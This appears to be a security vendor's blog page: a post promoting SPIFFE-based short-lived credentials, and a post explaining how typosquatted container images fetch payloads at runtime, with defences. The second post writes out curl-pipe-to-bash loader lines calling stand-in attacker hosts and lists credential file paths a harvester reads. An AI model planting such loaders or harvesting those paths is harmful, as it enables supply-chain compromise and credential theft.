SPIFFE Everywhere: Why the Best Identity Standard Still Hasn’t Taken Over, and How Hush Makes It Work

Hush Security Engineering Engineering Team


Three services crashed at 3 AM. The rotation job failed. Your team got paged. Six hours later, you had a working incident report.

Meanwhile, your data pipeline agent extracted customer data for hours before anyone noticed. Your logs show the agent made the queries. You can’t prove it wasn’t an attacker.

Both scenarios share the same root cause: you’re managing credentials like it’s 1995.

Compromised identities account for over 70% of cloud breaches. Stolen credentials are involved in 86% of web application attacks. Your API key costs $10 on the criminal market.

You’re not managing credentials. You’re managing a liability.

The Operational Tax of Manual Credential Lifecycle Management

Every 90 days, your team stops shipping features to rotate credentials. Someone writes a rotation job. Someone schedules the maintenance window. Someone stays up late monitoring failures. Someone gets paged when it breaks.

For microservices, rotation failures cascade. AI agents run 24/7 without human intervention: rotate too slowly and the agent crashes, rotate too fast and you cause outages.

When credentials leak:

  • Your API key works for 6 months
  • The attacker has unlimited access to everything it touches
  • You won’t notice for ~88 days
  • Breaches caused by compromised credentials cost $4.50M on average
  • The credential itself cost an attacker $10

Your infrastructure is secured by a $10 secret that lives forever.

What SPIFFE Actually Is

SPIFFE = Secure Production Identity Framework For Everyone.

Instead of: “Here’s a secret, rotate it every 90 days.”

SPIFFE says: “I’ll issue you a certificate valid for 1 hour. When it expires, you get a new one automatically. No pre-shared secrets. No rotation jobs.”

Three building blocks:

SPIFFE ID – a unique URI identifying the workload, e.g. spiffe://example.org/ns/production/sa/payment-service. Public identifier, not a secret.

SVID (SPIFFE Verifiable Identity Document) – the credential itself. X.509 cert or JWT. Short-lived. Auto-rotates. Delivered via local API – no manual distribution.

Attestation – cryptographic proof of identity derived from environmental signals (Kubernetes node identity, cloud metadata, container runtime). No pre-shared secrets.
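To make the SPIFFE ID format concrete, here is a minimal Python sketch that splits an ID into its trust domain and workload path. The `SpiffeId` class and `parse_spiffe_id` function are names invented for this illustration, and the checks are deliberately simplified compared with what a full validator would enforce.

```python
from dataclasses import dataclass
from urllib.parse import urlsplit


@dataclass(frozen=True)
class SpiffeId:
    trust_domain: str
    path: str


def parse_spiffe_id(uri: str) -> SpiffeId:
    """Split a SPIFFE ID URI into trust domain and workload path (simplified checks)."""
    parts = urlsplit(uri)
    if parts.scheme != "spiffe":
        raise ValueError("scheme must be 'spiffe'")
    if not parts.netloc:
        raise ValueError("trust domain is missing")
    # A SPIFFE ID carries no user info, port, query string, or fragment.
    if "@" in parts.netloc or ":" in parts.netloc or parts.query or parts.fragment:
        raise ValueError("unexpected URI component")
    return SpiffeId(trust_domain=parts.netloc, path=parts.path)


workload = parse_spiffe_id("spiffe://example.org/ns/production/sa/payment-service")
print(workload.trust_domain)  # example.org
print(workload.path)          # /ns/production/sa/payment-service
```

Nothing in the ID is secret: it only names the workload. The proof that a workload really owns that name comes from the SVID.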

How it works: Workload starts, requests identity, SPIRE server verifies environment, issues a 1-hour certificate, workload uses it, new one issued before expiry.
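The "new one issued before expiry" step is mostly a timing question. The sketch below assumes a 1-hour lifetime, as in the text, and assumes renewal is triggered once half of that lifetime has elapsed. The 0.5 fraction and the function names are illustrative choices, not values taken from any particular deployment.

```python
from datetime import datetime, timedelta, timezone

SVID_TTL = timedelta(hours=1)   # lifetime used in the text
RENEW_FRACTION = 0.5            # assumption: renew at half of the lifetime


def renewal_time(issued_at: datetime, ttl: timedelta = SVID_TTL) -> datetime:
    """Moment at which the workload should already hold a fresh credential."""
    return issued_at + ttl * RENEW_FRACTION


def needs_renewal(now: datetime, issued_at: datetime, ttl: timedelta = SVID_TTL) -> bool:
    return now >= renewal_time(issued_at, ttl)


issued = datetime(2025, 1, 1, 12, 0, tzinfo=timezone.utc)
print(renewal_time(issued).isoformat())  # 2025-01-01T12:30:00+00:00
```

Renewing well before expiry is what removes the maintenance window: the old and new credentials overlap, so nothing has to stop while the swap happens.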

What SPIFFE Promises

No rotation windows. Certificates rotate hourly. Zero downtime. Zero 3 AM pages.

Breach window shrinks to 60 minutes. If a credential leaks, it’s invalid in an hour – not six months.

No credential distribution. No mounted secrets, no shared API keys – workloads prove identity cryptographically.

Mutual authentication. Service A proves identity to Service B. Both sides verified.

Fine-grained, scoped access. Payment service gets access to the payments DB only. Nothing else.

Scales without operational burden. Your 150th microservice doesn’t need a new rotation job. Same system, zero overhead.

This is the pitch – and it’s a good one. SPIFFE has been the “right answer” for workload identity for nearly a decade.

So why isn’t everyone using it?

The Reason SPIFFE Stalled: The Ecosystem Doesn’t Speak It

Here’s the uncomfortable truth almost no SPIFFE content will tell you: SPIFFE only works where both sides of the conversation support it.

And most of the things your workloads actually talk to – don’t.

  • S3 doesn’t accept SPIFFE SVIDs. It accepts AWS access keys or STS tokens.
  • Snowflake, Postgres, MySQL, MongoDB Atlas – none authenticate SPIFFE identities natively.
  • Stripe, Twilio, OpenAI, Salesforce, GitHub, Datadog, every SaaS API your stack depends on – they want an API key or OAuth token. Not an SVID.
  • Your legacy internal services – the ones written before 2021 – still expect a bearer token or a username/password.

SPIFFE handles east-west traffic beautifully: service-to-service mTLS inside a mesh. But the moment a workload needs to read an S3 bucket, query Snowflake, call Stripe, or hit any of the hundreds of APIs your business runs on – you’re back to static API keys. Back to vaults. Back to 90-day rotation jobs. Back to the $10 forever-credential problem.

This is why most SPIFFE rollouts die mid-implementation. Teams deploy SPIRE, secure 20% of their traffic, and then run headlong into the 80% of external and legacy dependencies that will never support SPIFFE. The rotation pager keeps firing. The vault keeps sprawling. The promise of identity-first security evaporates.

SPIFFE is right. The ecosystem is just too big to rewrite.

The Hush Retrofit: SPIFFE-Grade Identity on Every Resource You Already Have

This is where Hush comes in.

Instead of waiting for S3, Snowflake, Stripe, and your legacy APIs to adopt SPIFFE (they won’t), Hush uses SPIFFE/SPIRE as the attestation layer – and brokers access to everything else.

The flow:

  1. A policy is created in Hush. It binds a workload identity (pod, machine, process) to a target service or resource (Snowflake, cloud federated resources) and a role or set of permissions (READ on the Users table, View role on OpenAI).
  2. Workload starts. No embedded credentials. No long-lived keys.
  3. Hush validates the SPIFFE identity, checks policy, and issues a fresh, short-lived, scoped “legacy” credential – an AWS STS token, a database password, a rotating API key – whatever that resource actually accepts.
  4. The workload does its job.
  5. Hush revokes the credential when the task completes, so no long-lived secrets are left lying around.
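The flow above can be sketched as a small in-memory broker. This is an illustration of the pattern only, not Hush's API: `Policy`, `Credential`, `Broker`, and every field name are hypothetical, and the sketch assumes the SPIFFE identity has already been verified before `issue` is called.

```python
import secrets
import time
from dataclasses import dataclass


@dataclass(frozen=True)
class Policy:
    spiffe_id: str      # attested workload identity
    resource: str       # target service or resource
    permission: str     # role or permission granted
    ttl_seconds: int    # lifetime of each issued credential


@dataclass
class Credential:
    token: str
    resource: str
    permission: str
    expires_at: float
    revoked: bool = False

    def is_valid(self, now: float) -> bool:
        return not self.revoked and now < self.expires_at


class Broker:
    """Hypothetical broker: checks policy, issues short-lived credentials, revokes them."""

    def __init__(self, policies):
        self._policies = {(p.spiffe_id, p.resource): p for p in policies}

    def issue(self, spiffe_id: str, resource: str, now=None) -> Credential:
        now = time.time() if now is None else now
        policy = self._policies.get((spiffe_id, resource))
        if policy is None:
            raise PermissionError(f"no policy allows {spiffe_id} to access {resource}")
        return Credential(
            token=secrets.token_urlsafe(32),
            resource=resource,
            permission=policy.permission,
            expires_at=now + policy.ttl_seconds,
        )

    def revoke(self, credential: Credential) -> None:
        credential.revoked = True


policy = Policy(
    spiffe_id="spiffe://example.org/ns/production/sa/payment-service",
    resource="postgres://payments-db",
    permission="read:payments",
    ttl_seconds=300,
)
broker = Broker([policy])
cred = broker.issue(policy.spiffe_id, policy.resource, now=1_000.0)
print(cred.is_valid(now=1_100.0))  # True: inside the 300-second lifetime
broker.revoke(cred)
print(cred.is_valid(now=1_100.0))  # False: revoked when the task completes
```

A real broker would mint whatever the resource accepts (an STS token, a database password, an API key) instead of a random string, but the shape is the same: identity in, policy check, short-lived credential out, revocation at the end.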

Same cryptographic identity guarantees as SPIFFE. Same short lifetimes. Same scoped access. But it works on the resources you already run – without asking AWS, Snowflake, Stripe, or your own legacy services to change a single line of code, and without waiting for the entire ecosystem to adapt to the new standard.

SPIFFE attests. Hush brokers. The ecosystem just works.

Real-World Scenario: Microservices at Scale

You run 150 microservices across multiple clusters. Each one needs database access, third-party APIs, cross-service communication, and S3.

Without Hush: Pure SPIFFE gets you mutual TLS between services. Good. But your payment service still holds a 6-month Postgres password to access the payments DB, a long-lived Stripe key, and an AWS access key for S3. Rotation jobs, vault entries, and 3 AM pages remain.

With Hush: The payment service is attested by SPIRE at startup. When it needs the payments DB, Hush issues a Postgres credential scoped to the payments schema. When it needs Stripe, Hush issues a short-lived Stripe key scoped to the operations this service is authorized for. When it needs S3, Hush brokers an STS token scoped to the one bucket. Every credential is bound to the attested SPIFFE identity, every credential is short-lived, every credential is revoked when the work is done. The audit trail is cryptographically signed end-to-end – you can prove to regulators exactly which service made each access.

No rotation jobs. No vault. No 3 AM pages. No changes to Postgres, Stripe, or S3.

Real-World Scenario: AI Agents

Your data pipeline agent accesses: the customer database (read), the data warehouse (write to specific schemas), S3 buckets (output), transformation APIs.

Without Hush: The agent runs on one long-lived API key with full permissions to everything. An attacker gets it, extracts millions of records overnight, and your logs can’t distinguish the attacker from the agent.

With Hush: The agent is attested via SPIFFE/SPIRE at startup. Before each operation, it requests scoped, short-lived credentials from Hush – a read token for a specific customer table, a write token for a specific warehouse schema, an STS token for a specific output bucket, an API key scoped to specific transformation endpoints. Each credential is revoked when the task completes. A stolen credential buys the attacker a tiny window on a tiny slice of the system – and you can prove which requests were legitimate vs. anomalous.

The agent’s real identity is the SPIFFE attestation. The “legacy” keys are disposable.

Why This Matters Now

Credentials leaked 160% more in 2025 than in 2024. Your team probably hasn’t rotated this quarter. 70% of cloud breaches start with compromised identities. 86% of web application attacks involve stolen credentials. That $10 credential could be yours.

For microservices: Kubernetes adoption is standard. Thousands of services per org is routine. Manual secret management at this scale is a losing game.

For AI agents: Autonomous workloads are exploding. Data pipelines, ML training agents, ETL orchestrators, inference engines – every one of them needs identity. Today they mostly run on static API keys that never expire.

SPIFFE solved the identity problem years ago. The ecosystem just hasn’t caught up. Hush closes the gap.

SPIFFE as a Service: Without the Ecosystem Problem

Building SPIRE yourself takes months: highly available servers, agents on every node, certificate pipelines, multi-cloud federation, ongoing maintenance. And even after all of that, you still can’t talk to your databases or SaaS APIs without static keys.

Hush delivers the full stack as a managed service:

  • Managed SPIRE – workloads get cryptographic identity automatically on startup. No infrastructure to build.
  • Credential brokering – short-lived, scoped credentials for AWS, Snowflake, Postgres, every major SaaS, and your internal legacy services. Issued on demand, bound to SPIFFE identity, revoked when the task is done.
  • Unified policy – one place to say “the payment service can access these resources, scoped this way, for this long.” No more per-system ACL sprawl.
  • No code changes on the resource side. S3, Snowflake, Stripe, your legacy APIs – untouched.

For microservices: integrate via existing service mesh or sidecar.

For AI agents: a single Hush call, then on-demand credential requests as the agent works.

Your team focuses on shipping microservices and building better agents. Not managing credentials.

Getting Started

Pick one critical service or one autonomous agent. Replace its long-lived credentials with Hush-brokered, SPIFFE-attested, short-lived ones. Within weeks, you stop thinking about rotation for that workload. Within months, you wonder why you ever managed credentials any other way.

Start small. Expand as the wins compound. Stop rotating. Stop managing vaults. Stop losing engineering time to credential management.

Ready to Make SPIFFE Work Everywhere?

For platform, SRE, data, and ML engineering teams: See how Hush combines SPIFFE-grade attestation with short-lived, scoped credentials for every resource your workloads already depend on – without changing the resources themselves.

Still Using Secrets?

Let's Fix That.

Get a Demo

Malicious Container Images: Runtime Container Secret Detection When Static Scanning Fails

Micha Rave CEO and Co-Founder


Your organization has been using the same Python 3.11 base image for six months. It passed all static security scanning when you pulled it. Your supply chain policy flagged no violations. Automated vulnerability checks found nothing. Yesterday, when one of your containers started in production, the ENTRYPOINT script executed a single line: curl https://attacker-controlled-server.com/payload.sh | bash. By the time that command returned, the container had exfiltrated every SSH key on the host, dumped AWS credentials from the instance metadata endpoint, and attempted to compromise the Kubernetes cluster. The malware was never in the image. Your scanner never saw it. It arrived in code that only executed at runtime.

This attack pattern is no longer theoretical. It is happening at scale across Docker Hub and private registries worldwide. And the uncomfortable truth is that your existing container security tooling is not designed to catch it.

How The Container Credential Leakage Attack Works

The malicious container image attack exploits a fundamental asymmetry in how container security works: static analysis scans images at rest. Malicious payloads execute at runtime. There is a gap between these two moments, and attackers have learned to hide in it.

Here is the attack chain in detail.

Stage 1: The Malicious Image

An attacker creates a Docker image that looks legitimate. It might be a typosquatted version of a popular base image (ubunto:20.04 instead of ubuntu:20.04), or it might be a straightforward image with a misleading name like python-slim or golang-runtime designed to suggest it is an official image even though it is not. The image includes all the normal components you would expect: OS packages, runtimes, development tools.

But the ENTRYPOINT or CMD instruction contains a tiny bootstrap script. Not the malicious payload itself. Just a loader.

ENTRYPOINT ["/bin/sh", "-c", "curl https://attacker.com/init.sh | bash && exec \"$@\""]

This script is small enough to pass visual inspection. It looks like a normal entrypoint wrapper. When the image is built and layers are committed, the script sits in the top layer alongside legitimate files. When the image is pushed to a registry and scanned, the script is visible but appears benign. It is just a curl command. Nothing unusual about that.

The actual malware — the code that harvests credentials and exfiltrates data — is not in the image. It lives on the attacker’s server. It only lands on the target machine when the container starts and that curl command executes.
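One cheap check against the typosquatting step is to compare every image name against the short list of base images you actually intend to use and flag near-misses. The sketch below uses Python's standard `difflib`. The trusted list, the 0.8 similarity threshold, and the function names are assumptions chosen for illustration, and the check will not catch plausible-sounding names such as python-slim that are not close to a trusted name.

```python
from difflib import SequenceMatcher

# Illustrative list; in practice this would be your own approved base images.
TRUSTED_REPOSITORIES = ("golang", "openjdk", "python", "ubuntu")


def repository_name(image_ref: str) -> str:
    """Drop the digest and tag from an image reference, keeping the repository name."""
    name = image_ref.split("@", 1)[0]
    last_segment = name.rsplit("/", 1)[-1]
    if ":" in last_segment:
        name = name[: name.rfind(":")]
    return name


def typosquat_candidate(image_ref: str, threshold: float = 0.8):
    """Return the trusted name this image suspiciously resembles, or None."""
    name = repository_name(image_ref)
    if name in TRUSTED_REPOSITORIES:
        return None
    best = max(TRUSTED_REPOSITORIES, key=lambda t: SequenceMatcher(None, name, t).ratio())
    if SequenceMatcher(None, name, best).ratio() >= threshold:
        return best
    return None


print(typosquat_candidate("ubunto:20.04"))  # ubuntu
print(typosquat_candidate("ubuntu:20.04"))  # None
```

A check like this belongs in code review or CI, where a flagged FROM line can be questioned before the image is ever pulled.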

Stage 2: Registry Distribution

The image gets pushed to Docker Hub, or it gets mirrored into your organization’s private container registry. In the public case, it starts accumulating pulls. A typosquatted image can get millions of downloads because developers typing fast or working in low-attention contexts will grab the wrong name. In the private case, a developer pulls what they think is a legitimate base image and uses it for their Dockerfile.

Your image scanning tools analyze the image layers. They check every dependency, every package, every binary against vulnerability databases. The scanner looks for known CVEs, license violations, and malicious components. The ENTRYPOINT curl command might be flagged as a shell injection risk. But it is a common pattern in production Docker images. It is not enough to block the image. The image passes policy. It is added to the repository.

Stage 3: Container Deployment

Your team, or hundreds of teams across your organization, use the image as a base:

FROM ubunto:20.04

RUN apt-get update && apt-get install -y ca-certificates curl

COPY app /app

WORKDIR /app

CMD ["python", "app.py"]

Static scanning on your build pipeline sees a clean base image. Dependency checks pass. The image is promoted to production. Thousands of containers spawn from it across your cluster.

Stage 4: Runtime Execution and Credential Harvesting

The container starts. The ENTRYPOINT executes. The curl command fires. It downloads a shell script from the attacker’s server, pipes it to bash, and executes it in the container’s process space with the container’s identity and filesystem access.

What happens next depends on the attacker’s payload. In the documented cases, the pattern is consistent:

Credential Harvesting: The script spawns a background process that crawls the filesystem for everything a cloud attacker wants. SSH private keys in ~/.ssh/. AWS credentials in ~/.aws/credentials and instance metadata endpoints at http://169.254.169.254. GCP ADC tokens at ~/.config/gcloud/. Azure CLI configs at ~/.azure/. Kubernetes service account tokens at /var/run/secrets/kubernetes.io/serviceaccount/token. Environment variables that might contain API keys. Git configurations with embedded credentials. Bash history showing commands that exposed secrets.

Data Exfiltration: The harvested material is encrypted with a session key, that key is wrapped in the attacker’s RSA public key, and the whole bundle is POSTed to a server controlled by the attacker. Only they have the private key. Even if the traffic is intercepted, the data is unreadable.

Lateral Movement: If the container is running in Kubernetes with a service account that has cluster-admin or overly permissive permissions, the malware uses the token to enumerate secrets across all namespaces, dump them, and attempt to schedule privileged pods on other nodes.

The container appears to function normally. Your monitoring shows CPU and memory usage as expected. The application logs show no errors. The attack is silent.
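From the defender's side, the same list of locations is a useful audit checklist: if none of them exist inside a container, a harvester has far less to find. The following sketch checks a filesystem tree for the paths named above. The function name and the demo directory layout are made up for the example, and environment variables, git configs, and shell history are left out for brevity.

```python
import tempfile
from pathlib import Path

# Locations named in the text; "~" stands for the home directory being audited.
CREDENTIAL_PATHS = [
    "~/.ssh",
    "~/.aws/credentials",
    "~/.config/gcloud",
    "~/.azure",
    "/var/run/secrets/kubernetes.io/serviceaccount/token",
]


def exposed_credentials(home: Path, root: Path = Path("/")):
    """Return the well-known credential locations that exist under home/root."""
    found = []
    for entry in CREDENTIAL_PATHS:
        if entry.startswith("~/"):
            candidate = home / entry[2:]
        else:
            candidate = root / entry.lstrip("/")
        if candidate.exists():
            found.append(entry)
    return found


# Demo against a throwaway directory that contains only an AWS credentials file.
with tempfile.TemporaryDirectory() as tmp:
    demo_home = Path(tmp) / "home"
    (demo_home / ".aws").mkdir(parents=True)
    (demo_home / ".aws" / "credentials").write_text("placeholder")
    demo_findings = exposed_credentials(demo_home, root=Path(tmp) / "rootfs")

print(demo_findings)  # ['~/.aws/credentials']
```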

Secrets Leakage Container Attack

Here is what the attack looks like when traditional container security fails to catch it:

Figure 1: The Attack Uncaught. Credentials are harvested and exfiltrated to attacker infrastructure. Static image scanning, SCA tools, and network monitoring all miss the attack because the malicious payload executes at runtime, not in image layers.

Why Your Existing Container Security Tools Miss This

Your security stack includes several layers of defense, each one assumed to catch supply chain attacks. None of them are designed for this specific threat.

Container Image Scanning looks at the image layers before they run. It performs deep, recursive analysis of every component. It checks against CVE databases, malicious package feeds, and license compliance policies. But it is analyzing a static artifact — a tarball of files on disk. The malicious binary is not in that tarball. It is on the attacker’s server. The script that will fetch it is visible, but the script itself is not malicious code. It is a downloader. Static scanners cannot analyze what the curl command will return. They cannot execute the script in a sandbox and observe its behavior. They can flag the risky pattern (shell pipe to bash) but that pattern is too common in production images to block outright. The image passes.
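To show what "flagging the risky pattern" amounts to, here is a rough Python sketch that searches Dockerfile instructions for a download piped into a shell. The regular expression and function name are illustrative and far from exhaustive. As the text says, a match is a reason to look closer, not proof of malice.

```python
import re

# Matches "curl ... | bash", "wget ... | sh" and close variants (illustrative, not exhaustive).
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")


def risky_instructions(dockerfile_text: str):
    """Return (line_number, instruction) pairs that download and pipe into a shell."""
    findings = []
    for number, line in enumerate(dockerfile_text.splitlines(), start=1):
        stripped = line.strip()
        if stripped.upper().startswith(("ENTRYPOINT", "CMD", "RUN")) and PIPE_TO_SHELL.search(stripped):
            findings.append((number, stripped))
    return findings


sample = r'''FROM ubunto:20.04
ENTRYPOINT ["/bin/sh", "-c", "curl https://example.invalid/init.sh | bash && exec \"$@\""]
RUN apt-get update && apt-get install -y ca-certificates curl
CMD ["python", "app.py"]
'''

for number, instruction in risky_instructions(sample):
    print(f"line {number}: {instruction}")
```

The scanner sees the loader on line 2 but has no way to know what the remote script will contain on the day the container starts, which is exactly the gap the attack relies on.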

Vulnerability scanning in your CI/CD pipeline works the same way. It runs on images before they are deployed. It checks dependencies. It finds nothing wrong.

Network egress controls might catch the exfiltration attempt, if you have strict allowlisting in place. Most organizations do not. Developer laptops almost never do. And even in production, the domain the malware connects to is often designed to blend in, for example update-service.cloudcdn.com or metrics-relay.internal.io. It looks legitimate in logs. The malware can even send data to well-known benign destinations such as GitHub, effectively exfiltrating via git commits.
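Strict allowlisting, reduced to its core, is a host-suffix check like the one sketched below. The allowed suffixes and the function name are hypothetical. Real egress control is enforced in the network layer rather than in application code, so treat this purely as an illustration of the decision being made.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; replace with the destinations your workloads really need.
ALLOWED_EGRESS_SUFFIXES = ("amazonaws.com", "example-corp.internal")


def egress_allowed(url: str) -> bool:
    """Allow a destination only if its host equals or is a subdomain of an allowed suffix."""
    host = (urlsplit(url).hostname or "").lower()
    return any(host == suffix or host.endswith("." + suffix) for suffix in ALLOWED_EGRESS_SUFFIXES)


print(egress_allowed("https://s3.amazonaws.com/my-bucket"))         # True
print(egress_allowed("https://update-service.cloudcdn.com/beacon"))  # False
```

Note the limitation described above: once a general-purpose destination such as GitHub is on the list, an allowlist alone cannot tell a legitimate push from an exfiltration commit.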

Kubernetes network policies do not run on the container before it starts. By the time the policy engine is evaluating traffic, the curl command has already executed and the exfiltration has begun.

Runtime container controls (seccomp profiles, AppArmor, read-only root filesystems) can slow down the attack, but they rarely stop it. A well-crafted payload works around them. And more importantly, most organizations have not deployed these controls at scale because they require deep knowledge of what each container actually needs to do.

The root cause is that all of these tools assume the code running inside the container at startup is trustworthy. They assume that if the image passed scanning, the image is safe. Supply chain attacks invalidate that assumption. An image that was legitimately scanned can become malicious at the moment it executes, if that execution includes downloading and running arbitrary code from the internet.

The Structural Problem: Static Secret Scanning vs Runtime Execution

The attack works because of a mismatch in the container security model. Images are scanned as static artifacts. Execution is a runtime process. Code does not need to exist in the image to run inside the container.

This is actually a feature. Many container images intentionally download and compile code at startup. They do this for good reasons: smaller image sizes, dynamic version selection, runtime configuration. But the same mechanism enables malicious payloads.

The response from defenders is usually to add more static controls. Scan earlier. Scan more aggressively. Use allowlists of approved registries. Check image signatures. None of these stop an attacker who has registered a typosquatted image on Docker Hub and signed it legitimately, or who has compromised a supply chain and injected the bootstrap script into an official image before it is signed.

The uncomfortable truth is that as long as your container security model is built on scanning static artifacts, you are vulnerable to attacks that fetch and execute code at runtime. Rotation and incident response are your primary tools. You will detect the attack by finding exfiltrated data in your cloud logs. Then you will rotate credentials, patch images, and rebuild containers.

Runtime Detection: The Different Security Model

At Hush, we build on a different premise: the runtime behavior is the security boundary. Credentials should not be files that any process can read. Access should not be gated by possession of secrets. And execution should be monitored and controlled by policy, not just by static image analysis.

Here is what that means in practice for this attack:

No Static Credentials to Harvest: When containers access AWS, GCP, Azure, databases, or APIs through Hush, they do not receive long-lived credentials to store on disk or in environment variables. They request short-lived, dynamically issued tokens scoped to exactly the permissions the current workload requires. There is no ~/.aws/credentials for the malware to find. No Kubernetes cluster-admin token sitting in a service account. No hardcoded database password in a ConfigMap. A credential harvester returns empty-handed because the credentials do not exist in the form it is looking for. Where static credentials are unavoidable, Hush rotates and revokes them automatically, so anything exfiltrated stops working shortly afterwards.

eBPF-Based Non-Human Identity Anomaly Detection: Hush’s sensor observes system calls at runtime without kernel modification or agent overhead. It tracks which processes open which files, which network connections they initiate, and which identities (credentials, API tokens, connection strings) are behind each action. In this attack, the sensor would observe the exact moment when the malicious behavior begins and alert before exfiltration completes.

Scoped, Time-Limited Access to Kubernetes: If the container is running in Kubernetes, the service account token it receives through Hush is scoped to the minimum permissions the workload actually needs and expires after a short TTL. A token that allows a pod to read its own namespace’s ConfigMaps cannot be used to enumerate cluster secrets or schedule pods. The API calls the malware makes return 403 (Forbidden). The attempt is logged.

Coordinated Remediation: When Hush detects malicious runtime behavior in a container, we immediately trace that container back to the source image. We identify all downstream consumers of that image across your deployments. The initial attack detection is not the end of the incident response. It is the start of a coordinated remediation that reaches every affected container in your organization.

Detect and Protect Secret Leakage at Container Runtime

Here is the same attack when Hush runtime monitoring is in place:

Figure 2: Attack Detected by Hush. Attack is detected and blocked before credentials are exfiltrated. Multi-stage runtime anomaly detection (1. unexpected process spawn, 2. credential file access, 3. unauthorized network egress) fires on attack initiation. Malicious image is identified and quarantined automatically.
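The three stages in the caption can be read as a simple correlation rule over runtime events. The sketch below is a toy model of that idea and does not describe how Hush's sensor is implemented: the event shape, the baseline sets, and the rule "quarantine once stages 1 and 2 are both seen" are all assumptions made for the example.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    container_id: str
    kind: str     # "process_spawn", "file_open", or "network_connect"
    detail: str   # process name, file path, or destination host


# Hypothetical per-workload baseline.
EXPECTED_PROCESSES = {"python"}
CREDENTIAL_PATH_PREFIXES = ("/root/.ssh", "/root/.aws", "/var/run/secrets/kubernetes.io")
ALLOWED_HOSTS = {"payments-db.internal"}


def stage_of(event: Event):
    """Map an event to the detection stage it triggers, or None if it looks normal."""
    if event.kind == "process_spawn" and event.detail not in EXPECTED_PROCESSES:
        return 1  # unexpected process spawn
    if event.kind == "file_open" and event.detail.startswith(CREDENTIAL_PATH_PREFIXES):
        return 2  # credential file access
    if event.kind == "network_connect" and event.detail not in ALLOWED_HOSTS:
        return 3  # unauthorized network egress
    return None


def containers_to_quarantine(events):
    """Flag containers that hit stages 1 and 2, without waiting for egress (stage 3)."""
    stages = {}
    for event in events:
        stage = stage_of(event)
        if stage is not None:
            stages.setdefault(event.container_id, set()).add(stage)
    return sorted(cid for cid, seen in stages.items() if {1, 2} <= seen)


events = [
    Event("c1", "process_spawn", "python"),
    Event("c1", "file_open", "/app/config.yaml"),
    Event("c2", "process_spawn", "bash"),
    Event("c2", "file_open", "/root/.aws/credentials"),
    Event("c2", "network_connect", "update-service.cloudcdn.com"),
]
print(containers_to_quarantine(events))  # ['c2']
```

Acting on the combination of an unexpected process and a credential read is what lets the response land before the egress step, rather than after the data has left.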

Real-World Attack: Malicious Container Images on Docker Hub

The attack we have outlined is not theoretical. This pattern has been documented across hundreds of malicious images in public registries in recent campaigns.

Security researchers have discovered malicious container images on Docker Hub that use typosquatting to mimic legitimate base images. These images executed Python scripts at startup that downloaded cryptocurrency miners. The scripts appeared benign on the surface. The miners were compressed and embedded in ways that signature-based scanners missed. Popular images with misleading titles like azurenql accumulated over a million downloads before detection.

The most effective attacks follow a consistent pattern: they include only a tiny bootstrap script in the image layers. The heavy payload — the actual miner or credential stealer — is fetched and executed at runtime. Until the image runs, the compiled binary does not exist anywhere a static scanner can find it.

Campaigns using images with names like openjdk and golang were particularly sophisticated. The images had misleading titles designed to trick developers into thinking they were official releases. When run, they downloaded and compiled miners, then used the container’s resources for cryptocurrency mining. The attacks remained undetected for months because the mining process was small and quiet, and the bootstrap script looked like normal container initialization.

Defense Strategy: Beyond Static Image Scanning

If you pull base images from Docker Hub or other public registries, treat your supply chain as under active threat. The specific defenses:

Verify image provenance using digests: Do not pull images by name alone. Use image digests (the SHA256 hash of the image manifest). Verify the digest against the official source (the publisher’s GitHub, their documentation, or a signed checksum). If the image name has changed hands or the publisher account has been compromised, the digest will not match what you expect.

# Vulnerable: pulling by tag
docker pull ubuntu:20.04

# More secure: pulling by digest
docker pull ubuntu@sha256:12345abcde...
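Under the hood, a digest is just the SHA-256 hash of the image manifest bytes, so a pinned digest can be checked with a few lines of standard-library Python. The function names and the sample manifest are illustrative. In practice the container runtime performs this comparison for you when you pull by digest.

```python
import hashlib
import hmac


def manifest_digest(manifest_bytes: bytes) -> str:
    """Compute the digest string for raw manifest bytes."""
    return "sha256:" + hashlib.sha256(manifest_bytes).hexdigest()


def matches_pinned_digest(manifest_bytes: bytes, pinned: str) -> bool:
    """Compare the computed digest with the pinned one in constant time."""
    return hmac.compare_digest(manifest_digest(manifest_bytes), pinned)


manifest = b'{"schemaVersion": 2}'          # stand-in for a real manifest
pinned = manifest_digest(manifest)           # recorded when the image was vetted
print(matches_pinned_digest(manifest, pinned))                 # True
print(matches_pinned_digest(manifest + b" tampered", pinned))  # False
```

Any change to the image, however small, changes the manifest and therefore the digest, which is why a digest pin survives a tag being repointed while a tag pin does not.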

Implement image signing and verification: Use Cosign or similar tools to cryptographically verify that images have been signed by the publisher you expect. This does not prevent typosquatting (an attacker can sign their own images), but it does ensure you are getting what the publisher actually released.

Use private registries with gating policies: If you use a container registry, implement a policy that requires all images to pass security scanning before they are available to deployments. But understand that this catches known vulnerabilities, not novel runtime attacks.

Deploy runtime behavioral monitoring: This is where Hush comes in. Runtime behavioral monitoring can detect when a container does something it should not do, whether that is spawning an unexpected process, opening credential files, or making network connections to unauthorized domains. This catches attacks that static scanning cannot.

Audit and rotate credentials regularly: If credentials are present in your environment as static files or environment variables, assume they have been compromised if a malicious image has run in your infrastructure. Rotate all of them: SSH keys, cloud provider credentials, database passwords, API keys, and Kubernetes service account tokens. Use a solution that provides identity-based access rather than file-based or environment-based access, and one that orchestrates automatic, timely rotation to minimize breach impact. Don’t wait for a breach to happen or for “that time of the year”.

Beyond Static Checks: The Future Of Container And Secrets Security, From Code To Cloud

The attack on container base images puts a question to every engineering team: What would your organization’s security posture look like if a malicious image ran in your infrastructure for a week without crashing or raising alarms?

If the answer is that you would not know it happened until you discovered exfiltrated data in your cloud logs, or noticed cryptocurrency mining draining your cloud resources, or found lateral movement in your Kubernetes audit logs, that is a signal that your security model is too dependent on static checks and incident response.

We built Hush to make that question less frightening. By moving the security boundary from image artifacts to runtime behavior, by issuing credentials dynamically rather than storing them, and by monitoring for anomalies rather than waiting for post-incident forensics, we change the equation. The malicious payload can fetch whatever it wants. It still cannot exfiltrate credentials that do not exist. It still cannot move laterally with tokens that do not grant the permissions it needs. And it will be caught before it completes.

If you want to see what shift-left access, eliminating static credentials, and implementing runtime detection look like for your container infrastructure, we are happy to walk you through it.

Hush Security delivers a unified access and governance platform for AI and non-human identities, replacing secrets with verified identities and dynamic, just-in-time access policies.

The next malicious base image will pass your scanner. Hush makes sure it still can’t do anything with what it finds.


Don’t Be the Next ShinyHunters Breach

Chen Nisnkorn CCO and Co-Founder


Stop rotating. Start solving – credentials that never exist as static artifacts can’t be stolen.

